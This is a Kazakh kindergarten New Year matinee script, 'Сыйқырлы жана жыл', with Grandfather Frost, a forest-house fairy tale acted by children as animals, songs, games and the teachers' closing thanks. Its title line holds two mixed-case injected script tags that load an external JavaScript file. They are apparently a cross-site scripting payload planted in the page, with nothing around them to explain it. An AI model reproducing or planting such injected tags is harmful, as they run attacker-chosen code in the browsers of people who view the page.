Ертенгілік «Сыйқырлы жана жыл», тәрбиешілер: Бектемирова Д.С Габдуллина С.М.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
27.12.2022
Ертенгілік «Сыйқырлы жана жыл»
Мақсаты : Балаларға Жаңа жыл мерекесі туралы мағлұматты жетілдіру. Жаңа жыл мерекесінің қызықтарын, әдемі көріністерін тамашалау арқылы қоршаған ортаға қызығушылығын арттыру. Балаларды бір - біріне деген достық сезімге, сүйіспеншілікке тәрбиелеу.
Жаңа жыл мерекесіне орай безендірілген залға музыка ырғағымен сәнді киінген балалар залға кіреді
Құттықтау сөзі: Қуаныш бөбекжайының Меңгерушісіне Бақтжамал Нығметовнаға беріледі
Балалар: Аяз Ата! Аяз Ата! – деп шақырады
Шырша шамын жағу
Аяз Ата:Балалар мен сендермен ойын ойнағым келіп тұр,ойнайсындар ма?
Ойын: «мұз бол».
Ән: «Келді міне жана жыл»
Тәрбиеші: «Ормандағы Үйшік» ертегі
Тышқандардың орындауында оркестр :
Тышқан Нұрхан: Қандай әдемі үйшік мен енді осында тұрамын.
Тәрбиеші :Тышқан үйшікке кіріп алады Бір күні орманнан бақалар шығады, үйшікті көріп жақындайды
Бақа Асадуллах: Үйшікте кім тұрады?
Тышқан: Қаптесер тышқан тұрады.
Ал сен кімсің?
Бақа: Мен секек бақамын. Сенімен тұрайыншы
Тышқан: Ендеше маған тақпақ айтып бер.
Ассадуллах, Арнұр, Айару, Данэлия, Т Амир, Ө Амир, Артем, Малика, Алим, Айзере.
Тышқан: Жарайсың бақа, кел, бірге тұрайық
Ақшақар : Балалар жарайсындар мен енді сендермен ойын ойнағып келіп тұр.
Ойын: «Кірпілер»
Тәрбиеші :Орманды кезіп қояндар шығады
Қоян Айя: Үйшікте кім тұрады
Тышқан: Қаптесер тышқан тұрады.
Бақа: Секек бақа тұрады. Ал сен кімсің
Қоян: Мен зымырауық қоянмын. Үйшікте сендермен тұрайыншы. Тышқан: Зымырауық қоян, өнерлерінді көрсетіңдер
Қоян: Жарайды
Би: « Ақ ұлпа қарлар »
Бақа: Жарайсың қоян. Кел, бірге тұрайық
Тәрбиеші :Үйшік аңдарға тола бастады олар онда тату тәтті өмір сүре бастады бір күні үйшіктің манына түлкі келеді
Түлкі Қ Санжар: Үйшікте кім тұрады.
Тышқан: Қаптесер тышқан тұрады.
Бақа: Секек бақа тұрады.
Қоян: Зымырауық қоян тұрады. Ал сен кімсің
Түлкі: Мен қу түлкімін. Сендермен бірге тұрайыншы. Мен суықта әбден тоңдым, қарным ашты
Қоян: Өнеріңді көрсетші
Түлкі: Жарайды
Түлкілердің орындауында тақпақ:Қ Санжар ,Рахман ,Алихан,
Раяна,Шерхан , Ясмина, Адия,Амина Жұмашева,
Қоян: Жарайсын түлкі, кел бірге тұрайық
Жана жыл Қоян: Қандай әдемі үйшік. Кім тұрады екен?
Тышқан: Біз тұрамыз
Жана жыл Қоян:Менде сендермен тұрайыншы
Бақа:Өнерінді көрсет
Жана жыл Қоян:Ендеше ойын ойнайық ойын ойнағыларын келеме
Ойын: «Өз баланды тауып ал»
Ән : «Ақ қоян»
Тақпақтар:Айя,Жақсылыкова Амина,Аружан,Аделия,Аймира,
Науан,Нұрхан,Азиза.
Жаңа жыл Қояны:Рахмет балалар,мені Аяз Ата іздеп қалған шығар.
Аяз Ата:А,Қоян сені біз күтіп жүрсек,сен мында ойнап жүрсің бе?Саған тапсырған балалардың сыйлығы қайда?
Жаңа жыл Қояны:Аяз Ата мен оны шырша түбіне тығып кеттім.Алып келеді.Балаларға таратылады.
Ағаштардың арасынан аю шығады.
Аю: Үйшікте кім тұрады.
Тышқан: Қаптесер тышқан тұрады.
Бақа: Секек бақа тұрады.
Қоян: Зымырауық қоян тұрады.
Түлкі: Құ түлкі тұрады.
Аю: Мен аюмын. Сендермен тұрғым келеді бірақ мен сыймаймын үйшікке
Аю : жүріңдер жаңа жылда көңіл көтерейік би билейк
Би: «Сантаклаус»
Ән: «Жасыл шырша»
Би :Қуыршақтар
Тәрбиеші: Аяз Ата Сіз біздің балалардың өнерін тамашаладыңыз, Сізге ұнады ма? Сыйлық әкелдіңіз.Ақшақар Аяз Атамыз қайда?
Ақшақар:Мен білмедім, балалар мен би биледім қайда екен?
Тәрбиеші:Балалар мына перденін артында кім бар екен?
Балалар келіп қарап Аяз Ата екенін тауып алады.
Аяз Ата: сыйлықтарын таратып береді.
Сыйлықтар таратылады.
Тәрбиеші: Құрметті қонақтар, балалар! «Сыйқырлы жана жыл!» жаңа жылға арналған мерекеміз аяқталып қалды. Осындай керемет өтуге ат салысып жүрген ата - аналар, әріптестерім сіздерге де мың алғыс! Көріп тамашалағандарыңа рахмет. Жаңа жыл құтты болсын, отбастарыңызға тек бақыт пен қуаныш әкелсін!!
Тәрбиешілер:Бектемирова Д.С
Габдуллина С.М.